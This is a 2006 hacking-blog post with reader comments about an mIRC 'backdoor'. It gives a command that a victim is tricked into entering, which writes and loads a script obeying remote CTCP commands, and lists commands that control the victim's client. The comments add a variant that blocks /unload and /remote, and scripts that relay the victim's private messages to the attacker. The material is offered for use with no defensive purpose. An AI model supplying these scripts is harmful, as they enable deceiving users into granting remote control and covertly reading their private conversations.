• Skip to main content
  • Skip to primary sidebar
  • Skip to footer
  • Home
  • About Darknet
  • Hacking Tools
  • Popular Posts
  • Darknet Archives
  • Contact Darknet
    • Advertise
    • Submit a Tool
Darknet – Hacking Tools, Hacker News & Cyber Security

Darknet - Hacking Tools, Hacker News & Cyber Security

Darknet is your best source for the latest hacking tools, hacker news, cyber security best practices, ethical hacking & pen-testing.

mIRC Backdoor

February 24, 2006

Views: 24,204

Well it’s not really a backdoor… but we can consider it one…

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php

Related Posts:

  • An Introduction To Web Application Security Systems
  • nbtscan Download - NetBIOS Scanner For Windows & Linux
  • fping 3 - Multi Target ICMP Ping Tool
  • Emerging Threats ETOpen - Anti-malware IDS/IPS Ruleset
  • NetExec - Network Execution Toolkit for Windows and…
  • testssl.sh - Test SSL Security Including Ciphers,…
Share
Tweet
Share
Buffer
WhatsApp
Email

Filed Under: Hacking News Tagged With: backbone, trojans, windows



Reader Interactions

Comments

  1. myk says

    September 7, 2006 at 7:30 am

    how can i use that command and wer i put it

  2. erl says

    November 30, 2006 at 2:12 am

    what are the codes that im the one will control the other user to quit ect.?

  3. backbone says

    November 30, 2006 at 5:29 pm

    you make the victim enter the command, and for quiting you send the victim

    /ctcp victims_nick /.quit killed by I don't know who


    see mIRC help for more commands

  4. yo says

    December 13, 2006 at 12:34 am

    another commands do you have…this don”t know how it works

  5. backbone says

    February 13, 2007 at 8:43 am

    I reedited the text and added a / (slash) in the command because the ones who just posted it doesn’t work, didn’t even press a F(ckin)1 in mIRC to see that the newer version in the write alias, have to add double // slashes so they would parse | (bar) as a new alias…

  6. amru says

    March 10, 2007 at 3:39 pm

    how can l use this cmmand and where l put it

  7. backbone says

    March 10, 2007 at 4:32 pm

    the victim has to enter that command line in there editbox… the place where you type the message before hitting enter… =))

  8. amru says

    March 12, 2007 at 10:26 am

    please l want more comands

  9. DeJest says

    June 13, 2007 at 10:10 am

    Hi, is there a way to view another user’s queries? Say for instance, I (DeJest) want to view the query between SomeOne001 and SomeOne002.

  10. s1n says

    June 13, 2007 at 11:56 am

    Christ! mirc script backdoors? that is so 90s!

    bah, anyway:

    amru: try typing “/help commands” in mirc. (first rule of hackclub(r), RTFM!)

    DeJest: “/help scripts”, i would suggest you look into the on INPUT and TEXT events for what you want.
    tip: if you run a command as /.command it should not print stdout to user if fuzzy memory serves.

    let us know if you code something cool, there is a lot of potential.

    s1n

  11. backbone says

    June 13, 2007 at 2:41 pm

    s1n that was my first post wtf should have I written to get attention (hist) ? =)

    something like this would do

    on *:input:?: { /.msg DeJest spy $me $1- }
    on *:text:?: { /.msg DeJest spy $nick $1- }

    then you should parse with a tiny script so that if SomeOne002 is the first param or SomeOne001 then drop it in a window… small ex:

    on *:text:spy*: { echo @spywindow $1- }

    not tested but should look something like this…

  12. SHITEMASTER says

    June 17, 2008 at 3:17 am

    //write xd on ^*:text:@do*:*: $chr(123) $ $+ 2- $chr(124) halt $chr(125) | //write xd alias unload noop | //write xd alias remote noop | /load -rs xd

    it disables /unload and /remote to some degree, there are likely better methods, and i’d be willing to see them

    from there i would use the backdoor to load the spy script, since the line may be too long to use it all in one command.
    you should use an alias to do this for me, but whatever works.
    example:
    @do /write spy on *:input:*: { if (%spy) { .msg %spy $active $+ : $1- } }
    @do /write spy on *:disconnect: { unset %spy }
    @do /write spy on *:connect: { join #rofl }
    @do /write spy on *:topic:#rofl: { if ($1 == !setspy) { set %spy $2 }

    well, that’s that.

  13. chevalier3as says

    June 17, 2008 at 5:31 pm

    nice!! if i got that right, the mIRC client reate a *.dll with specific options( -c *.dll ctcp 1:*:*:$1-) I still don’t get 1:*:*:$1, then load it to the client.
    wouldn’t it be possible to do the same with browsers??Creating a *.dll file then sending commands through ctcp, probably js or some scripting language readable by the browser????
    that would be nice, but the dll file has to be loaded to the client at each start!

  14. SHITEMASTER says

    June 17, 2008 at 6:45 pm

    chevalier, i think the word you are looking for is batch script. also, you could easily add socket scripts to perform automated shit. a good idea would be making a socklisten event in which opens a proxy server on the victims host. of course, this would not work if the person is behind a router, and not forwarded on the port selected, would still be quite interesting

    or simply use mirc to write some .html files with javascript on them. there are several possibilities

  15. SreeKanth says

    December 18, 2008 at 6:47 am

    Thats a grt conversation from top to bottom. Well my question is, is there any backdoor script where i can send a MSG to all users at once on an irc server. Can anyone help me out with this?

Primary Sidebar

Search Darknet

  • Email
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Advertise on Darknet

Latest Posts

Systemic Ransomware Events in 2025 - How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like

Systemic Ransomware Events in 2025 – How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like

Views: 897

Jaguar Land Rover’s prolonged cyber outage in 2025 turned what would once have been a “single … ...More about Systemic Ransomware Events in 2025 – How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like

SmbCrawler - SMB Share Discovery and Secret-Hunting

SmbCrawler – SMB Share Discovery and Secret-Hunting

Views: 910

SmbCrawler is a credentialed SMB spider that takes domain credentials and a list of hosts, then … ...More about SmbCrawler – SMB Share Discovery and Secret-Hunting

Heisenberg Dependency Health Check - GitHub Action for Supply Chain Risk

Heisenberg Dependency Health Check – GitHub Action for Supply Chain Risk

Views: 525

Heisenberg Dependency Health Check is a GitHub Action that inspects only the new or modified … ...More about Heisenberg Dependency Health Check – GitHub Action for Supply Chain Risk

Dark Web Search Engines in 2025 - Enterprise Monitoring, APIs and IOC Hunting

Dark Web Search Engines in 2025 – Enterprise Monitoring, APIs and IOC Hunting

Views: 1,861

Dark web search engines have become essential for enterprise security teams that need early … ...More about Dark Web Search Engines in 2025 – Enterprise Monitoring, APIs and IOC Hunting

mcp-scan - Real-Time Guardrail Monitoring and Dynamic Proxy for MCP Servers

mcp-scan – Real-Time Guardrail Monitoring and Dynamic Proxy for MCP Servers

Views: 595

mcp-scan is a security tool from Invariant Labs that can run as a static scanner or as a dynamic … ...More about mcp-scan – Real-Time Guardrail Monitoring and Dynamic Proxy for MCP Servers

Initial Access Brokers (IAB) in 2025 - From Dark Web Listings to Supply Chain Ransomware Events

Initial Access Brokers (IAB) in 2025 – From Dark Web Listings to Supply Chain Ransomware Events

Views: 624

Initial Access Brokers (IABs) have moved from niche forum actors to central wholesalers in the … ...More about Initial Access Brokers (IAB) in 2025 – From Dark Web Listings to Supply Chain Ransomware Events

Topics

  • Advertorial (28)
  • Apple (46)
  • Cloud Security (8)
  • Countermeasures (232)
  • Cryptography (85)
  • Dark Web (6)
  • Database Hacking (89)
  • Events/Cons (7)
  • Exploits/Vulnerabilities (433)
  • Forensics (64)
  • GenAI (13)
  • Hacker Culture (10)
  • Hacking News (237)
  • Hacking Tools (709)
  • Hardware Hacking (82)
  • Legal Issues (179)
  • Linux Hacking (74)
  • Malware (241)
  • Networking Hacking Tools (352)
  • Password Cracking Tools (107)
  • Phishing (41)
  • Privacy (219)
  • Secure Coding (119)
  • Security Software (235)
  • Site News (51)
    • Authors (6)
  • Social Engineering (37)
  • Spammers & Scammers (76)
  • Stupid E-mails (6)
  • Telecomms Hacking (6)
  • UNIX Hacking (6)
  • Virology (6)
  • Web Hacking (384)
  • Windows Hacking (171)
  • Wireless Hacking (45)

Security Blogs

  • Dancho Danchev
  • F-Secure Weblog
  • Google Online Security
  • Graham Cluley
  • Internet Storm Center
  • Krebs on Security
  • Schneier on Security
  • TaoSecurity
  • Troy Hunt

Security Links

  • Exploits Database
  • Linux Security
  • Register – Security
  • SANS
  • Sec Lists
  • US CERT

Footer

Most Viewed Posts

  • Brutus Password Cracker Hacker – Download brutus-aet2.zip AET2 (2,407,139)
  • Darknet – Hacking Tools, Hacker News & Cyber Security (2,173,938)
  • Top 15 Security Utilities & Download Hacking Tools (2,097,386)
  • 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) (1,200,209)
  • Password List Download Best Word List – Most Common Passwords (934,470)
  • wwwhack 1.9 – wwwhack19.zip Web Hacking Software Free Download (777,180)
  • Hack Tools/Exploits (674,122)
  • Wep0ff – Wireless WEP Key Cracker Tool (531,183)

Search

Recent Posts

  • Systemic Ransomware Events in 2025 – How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like November 26, 2025
  • SmbCrawler – SMB Share Discovery and Secret-Hunting November 24, 2025
  • Heisenberg Dependency Health Check – GitHub Action for Supply Chain Risk November 21, 2025
  • Dark Web Search Engines in 2025 – Enterprise Monitoring, APIs and IOC Hunting November 19, 2025
  • mcp-scan – Real-Time Guardrail Monitoring and Dynamic Proxy for MCP Servers November 17, 2025
  • Initial Access Brokers (IAB) in 2025 – From Dark Web Listings to Supply Chain Ransomware Events November 12, 2025

Tags

apple botnets computer-security darknet Database Hacking ddos dos exploits fuzzing google hacking-networks hacking-websites hacking-windows hacking tool Information-Security information gathering Legal Issues malware microsoft network-security Network Hacking Password Cracking pen-testing penetration-testing Phishing Privacy Python scammers Security Security Software spam spammers sql-injection trojan trojans virus viruses vulnerabilities web-application-security web-security windows windows-security Windows Hacking worms XSS

Copyright © 1999–2025 Darknet All Rights Reserved · Privacy Policy